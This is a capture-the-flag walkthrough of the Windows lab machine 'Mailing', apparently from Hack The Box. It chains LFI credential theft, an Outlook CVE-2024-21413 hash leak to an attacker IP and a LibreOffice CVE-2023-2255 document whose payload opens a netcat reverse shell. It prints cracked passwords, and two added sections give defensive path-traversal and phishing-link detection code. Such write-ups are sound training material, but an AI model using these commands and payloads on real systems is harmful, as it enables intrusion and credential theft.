Mailing
OS: Windows
Difficulty: Easy
Points: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.129.13.29 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p $ports -sC -sV -oN nmap.txt 10.129.13.29
Nmap scan report for 10.129.13.29
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: completed CAPABILITY OK ACL RIGHTS=texkA0001 IMAP4 IDLE SORT NAMESPACE QUOTA CHILDREN IMAP4rev1
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
64503/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
The main page has a button for downloading files.
This download function is vulnerable to LFI.
Local File Inclusion (LFI)
Through the LFI we can retrieve the hMailServer configuration file.
http://mailing.htb/download.php?file=../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
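The traversal above works because the download handler joins the user-supplied file name onto its base directory without checking where the result ends up. The following is an added example (not the box's download.php) of the check a hardened handler would perform: decode once, treat backslashes as separators since the server is IIS on Windows, normalize, and then compare the resolved path against the serving directory instead of searching for ".." substrings. DOWNLOAD_ROOT and the .pdf allowlist are assumptions.

```python
import posixpath
from urllib.parse import unquote_plus

# Assumed layout: the handler is only meant to serve files from this directory.
DOWNLOAD_ROOT = "/var/www/mailing/downloads"
ALLOWED_SUFFIXES = (".pdf",)  # the download feature on the page serves a PDF

def resolve_download(requested, root=DOWNLOAD_ROOT):
    """Map a ?file= value to a path inside root, or return None if it escapes.

    Decodes once (as the web server would before the application sees it),
    converts backslashes so "..\\.." is handled like "../..", and rejects
    absolute paths and drive letters, which would ignore the join entirely.
    """
    decoded = unquote_plus(requested)
    if "\x00" in decoded:
        return None
    normalized = decoded.replace("\\", "/")
    if posixpath.isabs(normalized) or ":" in normalized:
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, normalized))
    # The decisive check: the normalized result must still live under root.
    if not candidate.startswith(root_norm + "/"):
        return None
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return candidate

def is_traversal_attempt(requested):
    """True when the request would be rejected; useful for alerting on logs."""
    return resolve_download(requested) is None

if __name__ == "__main__":
    for value in ("instructions.pdf",
                  "../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini",
                  "..%5c..%5cwindows%5cwin.ini"):
        print(value, "->", resolve_download(value))
```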
Crack Hash
Using crackstation we recover the password.
homenetworkingadministrator
Microsoft Outlook RCE (CVE-2024-21413)
After some investigation we concluded that the target is probably vulnerable to CVE-2024-21413, since Outlook is mentioned repeatedly in the PDF served by the download function and we now have a username/password with which to send mail. We arrived at the Outlook exploit, which lets us leak information with the following script:
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.218\doom' --subject 'Test'
It is also possible to obtain it in the following way, which worked correctly for me.
swaks --auth LOGIN --server mailing.htb --port 587 --to maya@mailing.htb --from administrator@mailing.htb --auth-user administrator@mailing.htb --auth-password homenetworkingadministrator --body '<html><body><a href="file:///\\\\10.10.14.218\\test\\test.rtf!something">CLICK ME</a></body></html>'
responder -I tun0 -v
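What makes the message above dangerous is not the file: hyperlink by itself but the "!" appended to the path, which is the CVE-2024-21413 pattern. The following is an added example (not part of the original writeup) of a mail-gateway check that flags such links and extracts the UNC host the client would be steered to, so the message can be quarantined and the host blocked at the egress firewall; the two sample bodies are constructed, the first mirroring the body sent with swaks above.

```python
import re
from html.parser import HTMLParser

class HrefCollector(HTMLParser):
    """Collects the href value of every <a> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value is not None:
                    self.hrefs.append(value.strip())

# A file: hyperlink carrying a '!' anywhere after the scheme. Legitimate
# file: links to internal shares do not need one, so over-flagging is cheap.
MONIKER_LINK = re.compile(r"^file:.*!", re.IGNORECASE)
# Host portion of a UNC target: file:[///]\\host\share...
UNC_TARGET = re.compile(r"^file:/*\\\\+([^\\/!]+)", re.IGNORECASE)

def flag_moniker_links(html_body):
    """Return (href, unc_host) pairs for links that should be quarantined."""
    collector = HrefCollector()
    collector.feed(html_body)
    hits = []
    for href in collector.hrefs:
        if MONIKER_LINK.match(href):
            m = UNC_TARGET.match(href)
            hits.append((href, m.group(1) if m else None))
    return hits

# Constructed sample bodies.
MALICIOUS = r'<html><body><a href="file:///\\\\10.10.14.218\\test\\test.rtf!something">CLICK ME</a></body></html>'
BENIGN = r'<html><body><a href="https://mailing.htb/docs">Docs</a> <a href="file://fileserver/share/report.rtf">Report</a></body></html>'

if __name__ == "__main__":
    for body in (MALICIOUS, BENIGN):
        print(flag_moniker_links(body))
```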
We use John to crack the captured NetNTLMv2 hash.
┌──(root㉿kali)-[~/htb/Box/Mailing]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
m4y4ngs4ri (maya)
1g 0:00:00:06 DONE (2024-05-07 09:10) 0.1501g/s 890849p/s 890849c/s 890849C/s m61405..m4895621
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
With that password we can authenticate over WinRM.
evil-winrm -i mailing.htb -u 'maya' -p 'm4y4ngs4ri'
Privilege Escalation
At the root of the drive there is a folder called Important Documents.
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
Among the installed programs we also find LibreOffice, version 7.4.
*Evil-WinRM* PS C:\> type "Program Files\LibreOffice\readmes\readme_en-US.txt"
======================================================================
LibreOffice 7.4 ReadMe
======================================================================
LibreOffice (CVE-2023-2255)
This LibreOffice version is vulnerable to the following exploit.
First we upload nc.exe to the machine in order to obtain a reverse shell.
mkdir c:\temp
upload /root/htb/Box/Mailing/nc.exe c:\temp\
*Evil-WinRM* PS C:\Important documents> dir c:\temp
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 3:31 PM 45272 nc.exe
Now we generate our .odt file.
┌──(root㉿kali)-[~/htb/Box/Mailing/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.218 1234" --output 'doom.odt'
File doom.odt has been created !
Next we upload it to the machine's Important Documents directory.
*Evil-WinRM* PS C:\Important documents> upload /root/htb/Box/Mailing/CVE-2023-2255/doom.odt
Info: Uploading /root/htb/Box/Mailing/CVE-2023-2255/doom.odt to C:\Important documents\doom.odt
Data: 40704 bytes of 40704 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Important documents> dir
Directory: C:\Important documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 3:36 PM 30529 doom.odt
After a moment we receive our reverse shell.
This user holds every privilege, so we can perform any action.
References
https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
https://github.com/elweth-sec/CVE-2023-2255
https://github.com/int0x33/nc.exe/blob/master/nc64.exe